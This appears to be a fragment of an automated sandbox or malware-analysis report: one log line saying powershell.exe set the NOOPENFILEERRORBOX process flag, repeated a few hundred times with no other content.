                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
